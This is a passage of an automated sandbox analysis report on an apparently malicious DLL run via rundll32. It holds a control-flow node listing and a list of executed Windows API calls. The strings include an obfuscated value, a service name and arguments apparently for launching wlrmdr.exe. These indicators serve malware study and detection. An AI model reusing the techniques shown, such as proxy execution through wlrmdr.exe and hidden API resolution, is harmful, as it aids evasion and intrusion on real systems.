14302->14307 14305 6f9eb928 ___vcrt_freefls@4 17 API calls 14303->14305 14305->14306 14306->14256 14308 6f9ed121 14307->14308 14309 6f9ed113 14307->14309 14310 6f9ee7b1 __dosmaperr 17 API calls 14308->14310 14309->14308 14314 6f9ed139 14309->14314 14311 6f9ed129 14310->14311 14313 6f9ec276 __wsopen_s 50 API calls 14311->14313 14312 6f9ed133 14312->14303 14313->14312 14314->14312 14315 6f9ee7b1 __dosmaperr 17 API calls 14314->14315 14315->14311 14321 6f9e2be6 14316->14321 14319 6f9e47d6 _com_raise_error 2 API calls 14320 6f9e2c6c 14319->14320 14324 6f9e2b96 14321->14324 14325 6f9e3ece ___std_exception_copy 50 API calls 14324->14325 14326 6f9e2bc2 14325->14326 14326->14319 14328 6f9e105f __DllMainCRTStartup@12 14327->14328 14356 6f9ea9d7 14328->14356 14332 6f9e24cb 14331->14332 14336 6f9e24aa __fread_nolock 14331->14336 14333 6f9e2523 14332->14333 14334 6f9e24d3 __DllMainCRTStartup@12 14332->14334 14335 6f9e119f __DllMainCRTStartup@12 52 API calls 14333->14335 14338 6f9e2711 __DllMainCRTStartup@12 52 API calls 14334->14338 14337 6f9e2528 14335->14337 14336->14146 14339 6f9e24e6 __fread_nolock 14338->14339 14339->14336 14340 6f9e2529 __DllMainCRTStartup@12 50 API calls 14339->14340 14340->14336 14342 6f9e11b6 __EH_prolog3 14341->14342 14343 6f9e2e58 __DllMainCRTStartup@12 52 API calls 14342->14343 14344 6f9e11bf 14343->14344 14345 6f9e11cd SysAllocString 14344->14345 14346 6f9e11ee 14344->14346 14345->14346 14347 6f9e1201 __DllMainCRTStartup@12 14346->14347 14348 6f9e2c70 __DllMainCRTStartup@12 mydllmain 14346->14348 14347->14158 14349 6f9e1215 14348->14349 14351 6f9e1221 14350->14351 14353 6f9e1233 __DllMainCRTStartup@12 14350->14353 14351->14353 14415 6f9e1244 14351->14415 14353->14161 14355 6f9e2379 14354->14355 14357 6f9ea9eb __wsopen_s 14356->14357 14358 6f9eaa0d 14357->14358 14360 6f9eaa34 14357->14360 14359 6f9ec1f9 __wsopen_s 33 API calls 14358->14359 14361 6f9eaa28 14359->14361 14365 6f9e653f 14360->14365 14363 6f9e609e __wsopen_s 50 API calls 14361->14363 14364 6f9e1078 CoUninitialize 14363->14364 14364->14140 14366 6f9e654b ___scrt_is_nonwritable_in_current_image 14365->14366 14373 6f9eafcd EnterCriticalSection 14366->14373 14368 6f9e6559 14374 6f9e84bd 14368->14374 14373->14368 14388 6f9ef77e 14374->14388 14376 6f9e84e4 __DllMainCRTStartup@12 14395 6f9e87bb 14376->14395 14379 6f9e847f __DllMainCRTStartup@12 17 API calls 14380 6f9e8538 14379->14380 14410 6f9ef829 14380->14410 14383 6f9e2e45 _ValidateLocalCookies 5 API calls 14384 6f9e6566 14383->14384 14385 6f9e658e 14384->14385 14414 6f9eafe1 LeaveCriticalSection 14385->14414 14387 6f9e6577 14387->14361 14389 6f9ef740 __DllMainCRTStartup@12 50 API calls 14388->14389 14391 6f9ef78f __DllMainCRTStartup@12 14389->14391 14390 6f9ef7f1 14390->14376 14391->14390 14392 6f9ee7fe __fread_nolock 18 API calls 14391->14392 14393 6f9ef7e8 14392->14393 14394 6f9ee7c4 ___free_lconv_mon 17 API calls 14393->14394 14394->14390 14396 6f9ea6e6 __DllMainCRTStartup@12 50 API calls 14395->14396 14397 6f9e87d6 14396->14397 14398 6f9e87e1 14397->14398 14400 6f9e852b 14397->14400 14405 6f9e8809 __DllMainCRTStartup@12 14397->14405 14399 6f9ec1f9 __wsopen_s 33 API calls 14398->14399 14399->14400 14400->14379 14401 6f9e93cb __DllMainCRTStartup@12 59 API calls 14401->14405 14402 6f9e8f8f __DllMainCRTStartup@12 59 API calls 14402->14405 14403 6f9ea670 __wsopen_s 50 API calls 14403->14405 14404 6f9e86c9 __DllMainCRTStartup@12 50 API calls 14404->14405 14405->14400 14405->14401 14405->14402 14405->14403 14405->14404 14406 6f9e89fd 14405->14406 14407 6f9ec1f9 __wsopen_s 33 API calls 14406->14407 14408 6f9e8a17 14407->14408 14409 6f9ec1f9 __wsopen_s 33 API calls 14408->14409 14409->14400 14411 6f9ef834 14410->14411 14412 6f9e8545 14410->14412 14411->14412 14413 6f9f00d8 ___scrt_uninitialize_crt 75 API calls 14411->14413 14412->14383 14413->14412 14414->14387 14416 6f9e124c SysFreeString 14415->14416 14417 6f9e1257 14415->14417 14416->14417 14417->14353 14423 6f9ee79e 14418->14423 14420 6f9ee762 __dosmaperr 14421 6f9ee7b1 __dosmaperr 17 API calls 14420->14421 14422 6f9eb91e 14421->14422 14422->13807 14424 6f9ed968 __dosmaperr 17 API calls 14423->14424 14425 6f9ee7a3 14424->14425 14425->14420 14427 6f9eb0b8 14426->14427 14428 6f9eb0c9 14426->14428 14430 6f9ee7b1 __dosmaperr 17 API calls 14427->14430 14469 6f9eaff5 14428->14469 14432 6f9eb0bd 14430->14432 14433 6f9ec276 __wsopen_s 50 API calls 14432->14433 14435 6f9e1a7f 14433->14435 14434 6f9ee7b1 __dosmaperr 17 API calls 14434->14435 14435->14226 14436 6f9eb530 14435->14436 14437 6f9eb543 __wsopen_s 14436->14437 14520 6f9eb2c1 14437->14520 14440 6f9e609e __wsopen_s 50 API calls 14441 6f9e1a98 14440->14441 14442 6f9e650f 14441->14442 14443 6f9e6522 __wsopen_s 14442->14443 14564 6f9e5e03 14443->14564 14446 6f9e609e __wsopen_s 50 API calls 14447 6f9e1aa1 14446->14447 14448 6f9eb217 14447->14448 14449 6f9eb22a __wsopen_s 14448->14449 14618 6f9eb0f2 14449->14618 14451 6f9eb236 14452 6f9e609e __wsopen_s 50 API calls 14451->14452 14453 6f9e1ab0 14452->14453 14453->14219 14667 6f9ebf33 14454->14667 14458 6f9eae71 __DllMainCRTStartup@12 __wsopen_s 14457->14458 14810 6f9eab3e 14458->14810 14460 6f9eae92 14461 6f9e609e __wsopen_s 50 API calls 14460->14461 14472 6f9eb001 ___scrt_is_nonwritable_in_current_image 14469->14472 14470 6f9eb008 14471 6f9ee7b1 __dosmaperr 17 API calls 14470->14471 14473 6f9eb00d 14471->14473 14472->14470 14474 6f9eb02a 14472->14474 14475 6f9ec276 __wsopen_s 50 API calls 14473->14475 14476 6f9eb02f 14474->14476 14477 6f9eb03c 14474->14477 14480 6f9eb018 14475->14480 14478 6f9ee7b1 __dosmaperr 17 API calls 14476->14478 14486 6f9f01ef 14477->14486 14478->14480 14480->14434 14480->14435 14482 6f9eb04b 14484 6f9ee7b1 __dosmaperr 17 API calls 14482->14484 14483 6f9eb058 __DllMainCRTStartup@12 14494 6f9eb094 14483->14494 14484->14480 14487 6f9f01fb ___scrt_is_nonwritable_in_current_image 14486->14487 14498 6f9f189f EnterCriticalSection 14487->14498 14489 6f9f0209 14499 6f9f0293 14489->14499 14495 6f9eb098 __DllMainCRTStartup@12 14494->14495 14519 6f9eafe1 LeaveCriticalSection 14495->14519 14497 6f9eb0a9 14497->14480 14498->14489 14506 6f9f02b6 14499->14506 14500 6f9f030e 14501 6f9ef9d8 __dosmaperr 17 API calls 14500->14501 14503 6f9f0317 14501->14503 14504 6f9ee7c4 ___free_lconv_mon 17 API calls 14503->14504 14505 6f9f0320 14504->14505 14507 6f9efd31 __wsopen_s 7 API calls 14505->14507 14511 6f9f0216 14505->14511 14506->14500 14506->14506 14506->14511 14515 6f9eafcd EnterCriticalSection 14506->14515 14516 6f9eafe1 LeaveCriticalSection 14506->14516 14508 6f9f033f 14507->14508 14517 6f9eafcd EnterCriticalSection 14508->14517 14512 6f9f024f 14511->14512 14518 6f9f18e7 LeaveCriticalSection 14512->14518 14514 6f9eb045 14514->14482 14514->14483 14515->14506 14516->14506 14517->14511 14518->14514 14519->14497 14522 6f9eb2cd ___scrt_is_nonwritable_in_current_image 14520->14522 14521 6f9eb2d3 14523 6f9ec1f9 __wsopen_s 33 API calls 14521->14523 14522->14521 14524 6f9eb316 14522->14524 14526 6f9eb2ee 14523->14526 14531 6f9eafcd EnterCriticalSection 14524->14531 14526->14440 14527 6f9eb322 14532 6f9eb444 14527->14532 14529 6f9eb338 14541 6f9eb361 14529->14541 14531->14527 14533 6f9eb46a 14532->14533 14534 6f9eb457 14532->14534 14544 6f9eb36b 14533->14544 14534->14529 14536 6f9eb51b 14536->14529 14537 6f9eb48d __DllMainCRTStartup@12 14537->14536 14538 6f9f00d8 ___scrt_uninitialize_crt 75 API calls 14537->14538 14539 6f9eb4bb 14538->14539 14548 6f9ed48f 14539->14548 14563 6f9eafe1 LeaveCriticalSection 14541->14563 14543 6f9eb369 14543->14526 14545 6f9eb37c 14544->14545 14546 6f9eb3d4 __DllMainCRTStartup@12 14544->14546 14545->14546 14551 6f9ed44f 14545->14551 14546->14537 14557 6f9ed36e 14548->14557 14550 6f9ed4a8 14550->14536 14552 6f9ed463 __wsopen_s 14551->14552 14553 6f9ed36e __wsopen_s 52 API calls 14552->14553 14554 6f9ed478 14553->14554 14555 6f9e609e __wsopen_s 50 API calls 14554->14555 14556 6f9ed487 14555->14556 14556->14546 14558 6f9f365e __wsopen_s 50 API calls 14557->14558 14559 6f9ed380 14558->14559 14560 6f9ed39c SetFilePointerEx 14559->14560 14562 6f9ed388 __wsopen_s 14559->14562 14561 6f9ed3b4 GetLastError 14560->14561 14560->14562 14561->14562 14562->14550 14563->14543 14565 6f9e5e0f ___scrt_is_nonwritable_in_current_image 14564->14565 14566 6f9e5e16 14565->14566 14567 6f9e5e37 14565->14567 14568 6f9ec1f9 __wsopen_s 33 API calls 14566->14568 14575 6f9eafcd EnterCriticalSection 14567->14575 14570 6f9e5e2f 14568->14570 14570->14446 14571 6f9e5e42 14576 6f9e5e83 14571->14576 14575->14571 14582 6f9e5eb5 14576->14582 14578 6f9e5e51 14579 6f9e5e79 14578->14579 14617 6f9eafe1 LeaveCriticalSection 14579->14617 14581 6f9e5e81 14581->14570 14583 6f9e5eec 14582->14583 14584 6f9e5ec4 14582->14584 14586 6f9ed222 __fread_nolock 50 API calls 14583->14586 14585 6f9ec1f9 __wsopen_s 33 API calls 14584->14585 14594 6f9e5edf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14585->14594 14587 6f9e5ef5 14586->14587 14595 6f9ed431 14587->14595 14590 6f9e5f9f 14598 6f9e62a5 14590->14598 14592 6f9e5fb6 __DllMainCRTStartup@12 14592->14594 14610 6f9e60da 14592->14610 14594->14578 14596 6f9ed249 __DllMainCRTStartup@12 54 API calls 14595->14596 14597 6f9e5f13 14596->14597 14597->14590 14597->14592 14597->14594 14599 6f9e62b4 __wsopen_s 14598->14599 14600 6f9ed222 __fread_nolock 50 API calls 14599->14600 14601 6f9e62d0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14600->14601 14603 6f9ed431 __DllMainCRTStartup@12 54 API calls 14601->14603 14609 6f9e62dc 14601->14609 14602 6f9e2e45 _ValidateLocalCookies 5 API calls 14604 6f9e644e 14602->14604 14605 6f9e6330 14603->14605 14604->14594 14606 6f9e6362 ReadFile 14605->14606 14605->14609 14607 6f9e6389 14606->14607 14606->14609 14608 6f9ed431 __DllMainCRTStartup@12 54 API calls 14607->14608 14608->14609 14609->14602 14611 6f9ed222 __fread_nolock 50 API calls 14610->14611 14612 6f9e60ed 14611->14612 14613 6f9e6137 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 14612->14613 14614 6f9ed431 __DllMainCRTStartup@12 54 API calls 14612->14614 14613->14594 14615 6f9e6194 14614->14615 14615->14613 14616 6f9ed431 __DllMainCRTStartup@12 54 API calls 14615->14616 14616->14613 14617->14581 14619 6f9eb0fe ___scrt_is_nonwritable_in_current_image 14618->14619 14620 6f9eb12b 14619->14620 14621 6f9eb108 14619->14621 14628 6f9eb123 __DllMainCRTStartup@12 14620->14628 14629 6f9eafcd EnterCriticalSection 14620->14629 14622 6f9ec1f9 __wsopen_s 33 API calls 14621->14622 14622->14628 14624 6f9eb149 14630 6f9eb189 14624->14630 14626 6f9eb156 14644 6f9eb181 14626->14644 14628->14451 14629->14624 14631 6f9eb1b9 14630->14631 14632 6f9eb196 14630->14632 14634 6f9f00d8 ___scrt_uninitialize_crt 75 API calls 14631->14634 14643 6f9eb1b1 __DllMainCRTStartup@12 14631->14643 14633 6f9ec1f9 __wsopen_s 33 API calls 14632->14633 14633->14643 14635 6f9eb1d1 14634->14635 14647 6f9f01af 14635->14647 14638 6f9ed222 __fread_nolock 50 API calls 14639 6f9eb1e5 14638->14639 14651 6f9f07f3 14639->14651 14642 6f9ee7c4 ___free_lconv_mon 17 API calls 14642->14643 14643->14626 14666 6f9eafe1 LeaveCriticalSection 14644->14666 14646 6f9eb187 14646->14628 14648 6f9eb1d9 14647->14648 14649 6f9f01c6 14647->14649 14648->14638 14649->14648 14650 6f9ee7c4 ___free_lconv_mon 17 API calls 14649->14650 14650->14648 14652 6f9f081c 14651->14652 14657 6f9eb1ec 14651->14657 14653 6f9f086b 14652->14653 14655 6f9f0843 14652->14655 14654 6f9ec1f9 __wsopen_s 33 API calls 14653->14654 14654->14657 14658 6f9f0762 14655->14658 14657->14642 14657->14643 14659 6f9f076e ___scrt_is_nonwritable_in_current_image 14658->14659 14660 6f9f33e2 __wsopen_s EnterCriticalSection 14659->14660 14661 6f9f077c 14660->14661 14662 6f9f08c6 __wsopen_s 53 API calls 14661->14662 14663 6f9f07ad 14661->14663 14662->14663 14664 6f9f07e7 __DllMainCRTStartup@12 LeaveCriticalSection 14663->14664 14665 6f9f07d0 14664->14665 14665->14657 14666->14646 14669 6f9ebf3f ___scrt_is_nonwritable_in_current_image 14667->14669 14668 6f9ebf2e 14668->14222 14669->14668 14670 6f9ebf89 14669->14670 14671 6f9ebf52 __fread_nolock 14669->14671 14680 6f9eafcd EnterCriticalSection 14670->14680 14673 6f9ee7b1 __dosmaperr 17 API calls 14671->14673 14675 6f9ebf6c 14673->14675 14674 6f9ebf93 14681 6f9ebd3d 14674->14681 14677 6f9ec276 __wsopen_s 50 API calls 14675->14677 14677->14668 14680->14674 14682 6f9ebd6c 14681->14682 14685 6f9ebd4f __fread_nolock 14681->14685 14694 6f9ebfc8 14682->14694 14683 6f9ebd5c 14684 6f9ee7b1 __dosmaperr 17 API calls 14683->14684 14692 6f9ebd61 14684->14692 14685->14682 14685->14683 14687 6f9ebdad __fread_nolock 14685->14687 14686 6f9ec276 __wsopen_s 50 API calls 14686->14682 14687->14682 14689 6f9ebed8 __fread_nolock 14687->14689 14690 6f9ed222 __fread_nolock 50 API calls 14687->14690 14697 6f9ebfd0 14687->14697 14711 6f9ee197 14687->14711 14691 6f9ee7b1 __dosmaperr 17 API calls 14689->14691 14690->14687 14691->14692 14692->14686 14809 6f9eafe1 LeaveCriticalSection 14694->14809 14696 6f9ebfce 14696->14668 14698 6f9ebfe1 14697->14698 14702 6f9ebfdd __fread_nolock 14697->14702 14699 6f9ebfe8 14698->14699 14704 6f9ebffb __fread_nolock 14698->14704 14700 6f9ee7b1 __dosmaperr 17 API calls 14699->14700 14701 6f9ebfed 14700->14701 14703 6f9ec276 __wsopen_s 50 API calls 14701->14703 14702->14687 14703->14702 14704->14702 14705 6f9ec029 14704->14705 14706 6f9ec032 14704->14706 14707 6f9ee7b1 __dosmaperr 17 API calls 14705->14707 14706->14702 14709 6f9ee7b1 __dosmaperr 17 API calls 14706->14709 14708 6f9ec02e 14707->14708 14709->14708 14712 6f9ee1a9 14711->14712 14717 6f9ee1c1 14711->14717 14713 6f9ee79e __dosmaperr 17 API calls 14712->14713 14715 6f9ee1ae 14713->14715 14714 6f9ee503 14716 6f9ee79e __dosmaperr 17 API calls 14714->14716 14718 6f9ee7b1 __dosmaperr 17 API calls 14715->14718 14719 6f9ee508 14716->14719 14717->14714 14720 6f9ee204 14717->14720 14723 6f9ee1b6 14718->14723 14722 6f9ee20f 14720->14722 14720->14723 14728 6f9ee23f 14720->14728 14725 6f9ee79e __dosmaperr 17 API calls 14722->14725 14723->14687 14726 6f9ee214 14725->14726 14730 6f9ee258 14728->14730 14731 6f9ee265 14728->14731 14732 6f9ee293 14728->14732 14730->14731 14736 6f9ee281 14730->14736 14733 6f9ee79e __dosmaperr 17 API calls 14731->14733 14774 6f9ee7fe 14732->14774 14809->14696 14826 6f9ea6cb 14810->14826 14812 6f9eab99 14813 6f9eabbe 14812->14813 14817 6f9ea670 __wsopen_s 50 API calls 14812->14817 14833 6f9eae06 14813->14833 14814 6f9eab66 14816 6f9ec1f9 __wsopen_s 33 API calls 14814->14816 14815 6f9eab51 14815->14812 14815->14814 14825 6f9eab81 __DllMainCRTStartup@12 14815->14825 14816->14825 14817->14813 14825->14460 14827 6f9ea6e3 14826->14827 14828 6f9ea6d0 14826->14828 14827->14815 14829 6f9ee7b1 __dosmaperr 17 API calls 14828->14829 14830 6f9ea6d5 14829->14830 14831 6f9ec276 __wsopen_s 50 API calls 14830->14831 14832 6f9ea6e0 14831->14832 14832->14815 14834 6f9eae12 14833->14834 14835 6f9eae28 14833->14835 14949->13814 15411 6f9f72ac 15414 6f9f2892 15411->15414 15415 6f9f289b 15414->15415 15419 6f9f28cd 15414->15419 15420 6f9ed8d2 15415->15420 15421 6f9ed8dd 15420->15421 15422 6f9ed8e3 15420->15422 15424 6f9efcb0 __dosmaperr 7 API calls 15421->15424 15423 6f9efcef __dosmaperr 7 API calls 15422->15423 15442 6f9ed8e9 15422->15442 15425 6f9ed8fd 15423->15425 15424->15422 15426 6f9ef9d8 __dosmaperr 17 API calls 15425->15426 15425->15442 15428 6f9ed90d 15426->15428 15427 6f9ed0c1 CallUnexpected 50 API calls 15429 6f9ed967 15427->15429 15430 6f9ed92a 15428->15430 15431 6f9ed915 15428->15431 15432 6f9efcef __dosmaperr 7 API calls 15430->15432 15433 6f9efcef __dosmaperr 7 API calls 15431->15433 15434 6f9ed936 15432->15434 15440 6f9ed921 15433->15440 15435 6f9ed93a 15434->15435 15436 6f9ed949 15434->15436 15437 6f9efcef __dosmaperr 7 API calls 15435->15437 15438 6f9ed619 __dosmaperr 17 API calls 15436->15438 15437->15440 15441 6f9ed954 15438->15441 15439 6f9ee7c4 ___free_lconv_mon 17 API calls 15439->15442 15440->15439 15443 6f9ee7c4 ___free_lconv_mon 17 API calls 15441->15443 15442->15427 15444 6f9ed8ee 15442->15444 15443->15444 15445 6f9f269d 15444->15445 15468 6f9f27f2 15445->15468 15450 6f9f26e0 15450->15419 15451 6f9ee7fe __fread_nolock 18 API calls 15452 6f9f26f1 15451->15452 15453 6f9f26f9 15452->15453 15454 6f9f2707 15452->15454 15455 6f9ee7c4 ___free_lconv_mon 17 API calls 15453->15455 15486 6f9f28ed 15454->15486 15455->15450 15458 6f9f273f 15459 6f9ee7b1 __dosmaperr 17 API calls 15458->15459 15460 6f9f2744 15459->15460 15462 6f9ee7c4 ___free_lconv_mon 17 API calls 15460->15462 15461 6f9f2786 15464 6f9f27cf 15461->15464 15497 6f9f2316 15461->15497 15462->15450 15463 6f9f275a 15463->15461 15467 6f9ee7c4 ___free_lconv_mon 17 API calls 15463->15467 15466 6f9ee7c4 ___free_lconv_mon 17 API calls 15464->15466 15466->15450 15467->15461 15469 6f9f27fe ___scrt_is_nonwritable_in_current_image 15468->15469 15476 6f9f2818 15469->15476 15505 6f9f189f EnterCriticalSection 15469->15505 15471 6f9f2854 15506 6f9f2871 15471->15506 15472 6f9f2828 15472->15471 15478 6f9ee7c4 ___free_lconv_mon 17 API calls 15472->15478 15474 6f9ed0c1 CallUnexpected 50 API calls 15477 6f9f2891 15474->15477 15475 6f9f26c7 15479 6f9f2424 15475->15479 15476->15474 15476->15475 15478->15471 15480 6f9ef88b __DllMainCRTStartup@12 50 API calls 15479->15480 15481 6f9f2436 15480->15481 15482 6f9f2457 15481->15482 15483 6f9f2445 GetOEMCP 15481->15483 15484 6f9f246e 15482->15484 15485 6f9f245c GetACP 15482->15485 15483->15484 15484->15450 15484->15451 15485->15484 15487 6f9f2424 52 API calls 15486->15487 15488 6f9f290d 15487->15488 15489 6f9f2a12 15488->15489 15490 6f9f294a IsValidCodePage 15488->15490 15495 6f9f2965 __fread_nolock 15488->15495 15491 6f9e2e45 _ValidateLocalCookies 5 API calls 15489->15491 15490->15489 15492 6f9f295c 15490->15492 15493 6f9f2734 15491->15493 15494 6f9f2985 GetCPInfo 15492->15494 15492->15495 15493->15458 15493->15463 15494->15489 15494->15495 15510 6f9f24f8 15495->15510 15498 6f9f2322 ___scrt_is_nonwritable_in_current_image 15497->15498 15585 6f9f189f EnterCriticalSection 15498->15585 15500 6f9f232c 15586 6f9f2363 15500->15586 15505->15472 15509 6f9f18e7 LeaveCriticalSection 15506->15509 15508 6f9f2878 15508->15476 15509->15508 15511 6f9f2520 GetCPInfo 15510->15511 15512 6f9f25e9 15510->15512 15511->15512 15517 6f9f2538 15511->15517 15514 6f9e2e45 _ValidateLocalCookies 5 API calls 15512->15514 15513 6f9f3cd2 __DllMainCRTStartup@12 53 API calls 15515 6f9f25a0 15513->15515 15516 6f9f269b 15514->15516 15521 6f9f7263 15515->15521 15516->15489 15517->15513 15520 6f9f7263 56 API calls 15520->15512 15522 6f9ef88b __DllMainCRTStartup@12 50 API calls 15521->15522 15523 6f9f7276 15522->15523 15526 6f9f7074 15523->15526 15527 6f9f708f 15526->15527 15554 6f9f2c0b 15527->15554 15529 6f9f724e 15530 6f9e2e45 _ValidateLocalCookies 5 API calls 15529->15530 15531 6f9f25c1 15530->15531 15531->15520 15532 6f9f70d3 15532->15529 15533 6f9ee7fe __fread_nolock 18 API calls 15532->15533 15535 6f9f70f9 __alloca_probe_16 15532->15535 15546 6f9f71a1 15532->15546 15533->15535 15534 6f9f3dd3 __freea 17 API calls 15534->15529 15536 6f9f2c0b __fread_nolock MultiByteToWideChar 15535->15536 15535->15546 15537 6f9f7142 15536->15537 15537->15546 15557 6f9efd7c 15537->15557 15540 6f9f7178 15545 6f9efd7c 8 API calls 15540->15545 15540->15546 15541 6f9f71b0 15542 6f9f7239 15541->15542 15543 6f9ee7fe __fread_nolock 18 API calls 15541->15543 15547 6f9f71c2 __alloca_probe_16 15541->15547 15544 6f9f3dd3 __freea 17 API calls 15542->15544 15543->15547 15544->15546 15545->15546 15546->15534 15547->15542 15548 6f9efd7c 8 API calls 15547->15548 15549 6f9f7205 15548->15549 15549->15542 15565 6f9f2cc5 15549->15565 15551 6f9f721f 15551->15542 15552 6f9f7228 15551->15552 15568 6f9f3dd3 15552->15568 15572 6f9f2b73 15554->15572 15574 6f9efa4f 15557->15574 15560 6f9efd8d mydllmain 15563 6f9efdb2 15560->15563 15561 6f9efdb4 15577 6f9efdd9 15561->15577 15563->15540 15563->15541 15563->15546 15564 6f9efdcd LCMapStringW 15564->15563 15567 6f9f2cd8 __wsopen_s 15565->15567 15566 6f9f2d16 WideCharToMultiByte 15566->15551 15567->15566 15569 6f9f3ddf 15568->15569 15571 6f9f3df0 15568->15571 15570 6f9ee7c4 ___free_lconv_mon 17 API calls 15569->15570 15569->15571 15570->15571 15571->15546 15573 6f9f2b84 MultiByteToWideChar 15572->15573 15573->15532 15575 6f9efb4e __dosmaperr 5 API calls 15574->15575 15576 6f9efa65 15575->15576 15576->15560 15576->15561 15582 6f9efa69 15577->15582 15580 6f9efdea mydllmain 15581 6f9efdfa 15580->15581 15581->15564 15583 6f9efb4e __dosmaperr 5 API calls 15582->15583 15584 6f9efa7f 15583->15584 15584->15580 15584->15581 15585->15500 15587 6f9ebfd0 __fread_nolock 50 API calls 15586->15587 15588 6f9f2385 15587->15588 15589 6f9ebfd0 __fread_nolock 50 API calls 15588->15589 15590 6f9f23a4 15589->15590 15591 6f9f2339 15590->15591 15592 6f9ee7c4 ___free_lconv_mon 17 API calls 15590->15592 15593 6f9f2357 15591->15593 15592->15591 15596 6f9f18e7 LeaveCriticalSection 15593->15596 15595 6f9f2345 15595->15464 15596->15595 16511 6f9edb7b 16514 6f9edb02 16511->16514 16515 6f9edb0e ___scrt_is_nonwritable_in_current_image 16514->16515 16522 6f9f189f EnterCriticalSection 16515->16522 16517 6f9edb46 16527 6f9edb64 16517->16527 16518 6f9edb18 16518->16517 16523 6f9f3a12 16518->16523 16522->16518 16524 6f9f3a20 __dosmaperr 16523->16524 16526 6f9f3a2d 16523->16526 16525 6f9f3745 __dosmaperr 17 API calls 16524->16525 16524->16526 16525->16526 16526->16518 16530 6f9f18e7 LeaveCriticalSection 16527->16530 16529 6f9edb52 16530->16529 14950 6f9e31f9 14951 6f9e3207 14950->14951 14952 6f9e3202 14950->14952 14956 6f9e30c3 14951->14956 14971 6f9e33dd 14952->14971 14957 6f9e30cf ___scrt_is_nonwritable_in_current_image 14956->14957 14958 6f9e30f8 dllmain_raw 14957->14958 14959 6f9e30f3 14957->14959 14960 6f9e30de 14957->14960 14958->14960 14961 6f9e3112 dllmain_crt_dispatch 14958->14961 14962 6f9e1000 __DllMainCRTStartup@12 148 API calls 14959->14962 14961->14959 14961->14960 14963 6f9e3133 14962->14963 14964 6f9e3164 14963->14964 14967 6f9e1000 __DllMainCRTStartup@12 148 API calls 14963->14967 14964->14960 14965 6f9e316d dllmain_crt_dispatch 14964->14965 14965->14960 14966 6f9e3180 dllmain_raw 14965->14966 14966->14960 14968 6f9e314b 14967->14968 14969 6f9e3013 __DllMainCRTStartup@12 172 API calls 14968->14969 14970 6f9e3159 dllmain_raw 14969->14970 14970->14964 14972 6f9e33f3 14971->14972 14974 6f9e33fc 14972->14974 14975 6f9e3390 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14972->14975 14974->14951 14975->14974

              Executed Functions

              Function 6F9E1629 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 291filesleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,00000000,F9A742C7,%s%s,00000000,00000000), ref: 6F9E16D8
              • _strlen.LIBCMT ref: 6F9E17B1
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6F9E1809
                • Part of subcall function 6F9E1CFA: CoInitialize.OLE32(00000000), ref: 6F9E1D40
                • Part of subcall function 6F9E1CFA: CoCreateInstance.OLE32(6F9FB200,00000000,00000001,6F9FB1F0,?), ref: 6F9E1D59
                • Part of subcall function 6F9E1CFA: CoUninitialize.OLE32 ref: 6F9E1D70
              • CopyFileW.KERNEL32(?,?,00000000), ref: 6F9E191C
              • Sleep.KERNEL32(000003E8), ref: 6F9E1927
                • Part of subcall function 6F9EB8FB: MoveFileExW.KERNEL32(?,6F9E1940,00000002,?,6F9E1940,?,?), ref: 6F9EB908
                • Part of subcall function 6F9EB8FB: GetLastError.KERNEL32 ref: 6F9EB912
                • Part of subcall function 6F9EB8FB: __dosmaperr.LIBCMT ref: 6F9EB919
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E1953
              • CloseHandle.KERNEL32 ref: 6F9E195F
              • CloseHandle.KERNEL32 ref: 6F9E1967
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E19C4
              • CloseHandle.KERNEL32 ref: 6F9E19D0
              • CloseHandle.KERNEL32 ref: 6F9E19D8
              • FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CloseFileHandle$FindProcessTerminate$CopyCreateEnvironmentErrorExpandFirstInitializeInstanceLastMoveNextSleepStringsUninitialize__dosmaperr_strlen
              • String ID: %s%s$%s\%s$%s\*.*$%sk$-s 3600 -f 0 -t _ -m _ -a 11 -u $IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B$PT30S$WlrMakeService$wlrmdr.exe
              • API String ID: 3479604460-3724355521
              • Opcode ID: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction ID: 2b3570ad5de0d49ab488c1ca6e9674aea4e97dff0f1587f219a45bb17a011366
              • Opcode Fuzzy Hash: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction Fuzzy Hash: A7B19271904349AADF21DFA4DC49BEE37B8BF19318F00822AE908961C1EB759A85CB51
              Function 6F9E2959 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156sleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E29A3
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032,?,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6F9E29F6
                • Part of subcall function 6F9E1274: GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E12CA
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E1318
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E1336
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E137E
